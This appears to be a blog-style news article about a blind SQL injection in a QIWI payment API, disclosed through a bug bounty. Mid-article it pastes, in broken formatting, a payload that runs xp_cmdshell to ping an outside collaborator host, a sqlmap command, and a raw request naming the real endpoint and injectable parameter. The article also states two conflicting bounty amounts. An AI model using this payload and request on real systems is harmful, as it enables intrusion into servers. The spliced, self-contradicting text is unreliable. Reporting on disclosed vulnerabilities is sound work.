Nearly 4 months ago, a white hat hacker announced a blind SQL injection vulnerability in the QIWI( a popular publicly traded Russian payment service provider) API interface that allows an attacker to do arbitrary code execution on the servers. A blind SQL injection vulnerability is a vulnerability that allows an attacker to make request to the end database server that a person is not allowed to do . The company took around 4 months to patch this vulnerability and awarded an amount of $5,500 to the bug bounty hunter on hackerone. Qiwi is most widely used in Russia, Ukraine, Kazakhstan, Moldova, Belarus, Romania, the United States, and the United Arab Emirates and this vulnerability is one of the major flaw on the company’s end that could allow an attacker to exploit the target server and make malicious transactions.
ANALYSIS OF THE VULNERABILITY
The vulnerability lies in the API interface on https://contactws.contact-sys.com:3456/. API is used to make request from the third party sources which means that a web application can use this API to make request to the QIWI’s server. Now when requesting from the end server, every API has certain rules and parameters and if that rules and parameters are fulfilled, then only the server will see into the request coming from API. Now, here the QIWI API requests a <REQUEST/> body to interact with the server’s AppServ object and if the these parameters are not fulfilled, the API should return an error but here this was not the case. Qiwi API interface was not handling user’s input correctly. It was allowing an attacker to abuse the SCEN_ID parameter to inject arbitrary SQL statements into the WHERE clause of the underlying SQL statement made to the server. Here, a blind SQL injection arises which means that API will not show the results but the SQL statements you are making under your requests are executing on the server, thus allowing an attacker to execute arbitrary commands on the server through SQL statements. An arbitrary command like:
33; DECLARE @command varchar(255); SELECT @command='ping yhjbc2mndl88o89il3ueyud7zy5pte.burpcollaborator.net'; EXEC Master.dbo.xp_cmdshell @command; SELECT 1 as 'STEP' `` ## Steps to reproduce To confirm the SQL injection, run `sqlmap -r sqlitest.txt --batch --current-db --force-ssl` with the following `input.txt`: ```http POST / HTTP/1.1 Host: contactws.contact-sys.com:3456 Content-Type: application/xml Content-Length: 185 <REQUEST OBJECT_CLASS="TScenObject" ACTION="ScenObjects" SCEN_ID="33*" ExpectSigned="No" INT_SOFT_ID="DA61D1CE-757F-44C3-B3F7-11A026C37CD4" POINT_CODE="tzhr" lang="en"></REQUEST>
was made to the server and attacker can run any malicious commands that he want to. He might execute commands that could compromise the integrity, availability and confidentiality which are the fundamentals of privacy. An attacker can play with other servers in the network on which the target server lies.
CONCLUSION
Finally, on 19 June 2020, the bug founder was awarded a bug bounty of $7,500 on hackerone and it releases a new patch fixing this vulnerability.